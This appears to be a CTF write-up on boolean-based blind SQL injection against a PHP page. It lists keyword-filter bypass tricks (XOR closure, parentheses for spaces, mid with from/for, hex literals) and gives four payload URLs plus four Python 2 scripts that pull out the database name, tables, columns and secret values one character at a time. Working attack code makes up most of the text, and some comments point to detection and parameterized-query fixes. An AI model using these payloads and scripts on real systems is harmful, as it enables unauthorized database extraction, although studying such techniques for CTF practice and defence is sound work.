考点
异或闭合 '^1^'
两个空字符串异或的结果是0,0和1异或的结果是1
空格,%0b被过滤,用()绕过,绕的时候很容易眼花
ord、ascii、substr被过滤,而且没法用空格或者/**/绕过
mid没被过滤,可以用mid查询字母对比,但是mysql数据库是不分大小写,所以查询结果无法区分大小写
逗号被过滤
limit 0,1用limit 1 offset 0代替、
substr(字符串,2,1) 用 substr(字符串 from 2 for 1)代替、
但是这里学到了一个姿势,可以不用limit
select group_concat(distinct(table_name)) 可以查多个表名列名
用 where(table_schema)in(0x776562) 的形式来代替 where table_schema='web'
用 in(0x十六进制) 的形式来代替 ='a'
凡是库表列名都用十六进制表示
这里给出四句关键的payload
http://54.222.188.152:25718/index.php?id='^(mid(database()from(0)for(1))in(0x61))^'
http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(table_name)))from(information_schema.tables)where(table_schema)in(0x776562))from(0)for(1))in(0x61))^'
http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(column_name)))from(information_schema.columns)where(table_name)in(0x6d657373616765))from(0)for(1))in(0x61))^'
http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(secret)))from(web.message))from(0)for(1))in(0x61))^'
database.py
import requests
# database.py: boolean-based blind SQL injection probe from the writeup above.
# Each request asks one yes/no question ("is character N of database() equal
# to X?") and reads the answer from the page body, so a full run is
# len(chars) * 10 near-identical GETs whose only variation is the `id=`
# parameter. That burst should stand out in access logs and is the kind of
# thing a request-pattern rule can catch. The server-side fix is a
# parameterized query; the keyword blacklist described in the notes is
# bypassed by the payload shape below.
url="http://54.222.188.152:25718/index.php?id="
# Original full charset (with upper case) kept for reference.
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
# Candidate characters tried at each position. Upper case is omitted because
# the `in(...)` comparison cannot tell case apart (see the note on mid above).
# `\}` is not a recognised escape, so it stays as a literal backslash + `}`.
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# Characters confirmed so far, appended in position order.
result=''
# Position within database(): 0..9 inclusive.
for i in range(0,10):
# Rebound to its decimal string form for the %s substitution below.
i =str(i)
for j in chars:
# Rebound to a 0x.. literal (e.g. 'a' -> '0x61') so the payload needs no
# quotes; chr(int(j,16)) below reverses it.
j=hex(ord(j))
# The SQL fragment (first payload URL in the writeup); only the position and
# the hex literal change between requests. No break on a hit: every
# candidate is sent for every position.
payload = "'^(mid(database()from(%s)for(1))in(%s))^'"%(i,j)
# print url+payload
# No timeout and no error handling: a stalled response blocks the loop.
r=requests.get(url+payload)
# print r.text
# Oracle: the script treats 'Hello' in the body as a "true" answer.
if 'Hello' in r.text:
result +=chr(int(j,16))
# Python 2 print statement; the script is not Python 3 compatible as written.
print result
table.py
import requests
# table.py: same boolean-based blind probe as database.py, now reading the
# comma-joined list of table names in the schema given by the hex literal
# 0x776562 ('web' per the notes above). len(chars) * 50 GETs per run, all
# differing only in `id=`; a parameterized query on the server would make the
# whole technique moot regardless of which keywords are filtered.
url="http://54.222.188.152:25718/index.php?id="
# Original full charset (with upper case) kept for reference.
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
# Candidate characters; upper case omitted because the `in(...)` comparison
# cannot tell case apart. `\}` is a literal backslash + `}` (not an escape).
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# Characters confirmed so far, appended in position order.
result=''
# Position within the group_concat result: 0..49 inclusive.
for i in range(0,50):
# Rebound to its decimal string form for the %s substitution below.
i =str(i)
for j in chars:
# Rebound to a 0x.. literal so the payload needs no quotes; reversed below.
j=hex(ord(j))
# Second payload URL in the writeup; group_concat(distinct(...)) avoids
# limit, and where(...)in(0x..) replaces the quoted comparison. No break on
# a hit: every candidate is sent for every position.
payload = "'^(mid((select(group_concat(distinct(table_name)))from(information_schema.tables)where(table_schema)in(0x776562))from(%s)for(1))in(%s))^'"%(i,j)
# print url+payload
# No timeout and no error handling: a stalled response blocks the loop.
r=requests.get(url+payload)
# print r.text
# Oracle: the script treats 'Hello' in the body as a "true" answer.
if 'Hello' in r.text:
result +=chr(int(j,16))
# Python 2 print statement.
print result
column.py
import requests
# column.py: same boolean-based blind probe, now reading the comma-joined list
# of column names of the table named by the hex literal 0x6d657373616765 (the
# table dump.py later reads as web.message). len(chars) * 50 GETs per run,
# all differing only in `id=`.
url="http://54.222.188.152:25718/index.php?id="
# Original full charset (with upper case) kept for reference.
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
# Candidate characters; upper case omitted because the `in(...)` comparison
# cannot tell case apart. `\}` is a literal backslash + `}` (not an escape).
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# Characters confirmed so far, appended in position order.
result=''
# Position within the group_concat result: 0..49 inclusive.
for i in range(0,50):
# Rebound to its decimal string form for the %s substitution below.
i =str(i)
for j in chars:
# Rebound to a 0x.. literal so the payload needs no quotes; reversed below.
j=hex(ord(j))
# Third payload URL in the writeup; only the position and the hex literal
# change between requests. No break on a hit.
payload = "'^(mid((select(group_concat(distinct(column_name)))from(information_schema.columns)where(table_name)in(0x6d657373616765))from(%s)for(1))in(%s))^'"%(i,j)
# print url+payload
# No timeout and no error handling: a stalled response blocks the loop.
r=requests.get(url+payload)
# print r.text
# Oracle: the script treats 'Hello' in the body as a "true" answer.
if 'Hello' in r.text:
result += chr(int(j,16))
# Python 2 print statement.
print result
dump.py
#!coding:utf-8
import requests
# dump.py: same boolean-based blind probe, now reading the comma-joined
# `secret` values of web.message. len(chars) * 100 GETs per run, all differing
# only in `id=`; the volume and the fixed "'^(mid(" prefix are what a log
# review or request-pattern rule would key on. Parameterized queries on the
# server close the hole independently of any keyword filter.
url="http://54.222.188.152:25718/index.php?id="
# Candidate characters (a trailing space is included here, unlike the other
# scripts). `\}` is a literal backslash + `}`, not an escape.
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],. ' # the character set is narrowed here
# Original full charset (with upper case) kept for reference.
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
# MySQL compares case-insensitively here; since ord and ascii are both filtered, only an `in` comparison is possible, so case cannot be distinguished: upper- and lower-case probes both match.
# Characters confirmed so far, appended in position order.
result=''
# Position within the group_concat result: 0..99 inclusive.
for i in range(0,100):
# Rebound to its decimal string form for the %s substitution below.
i =str(i)
for j in chars:
# Rebound to a 0x.. literal so the payload needs no quotes; reversed below.
j=hex(ord(j))
# Fourth payload URL in the writeup; only the position and the hex literal
# change between requests. No break on a hit.
payload = "'^(mid((select(group_concat(distinct(secret)))from(web.message))from(%s)for(1))in(%s))^'"%(i,j)
# print url+payload
# No timeout and no error handling: a stalled response blocks the loop.
r=requests.get(url+payload)
# print r.text
# Oracle: the script treats 'Hello' in the body as a "true" answer.
if 'Hello' in r.text:
result += chr(int(j,16))
# Python 2 print statement.
print result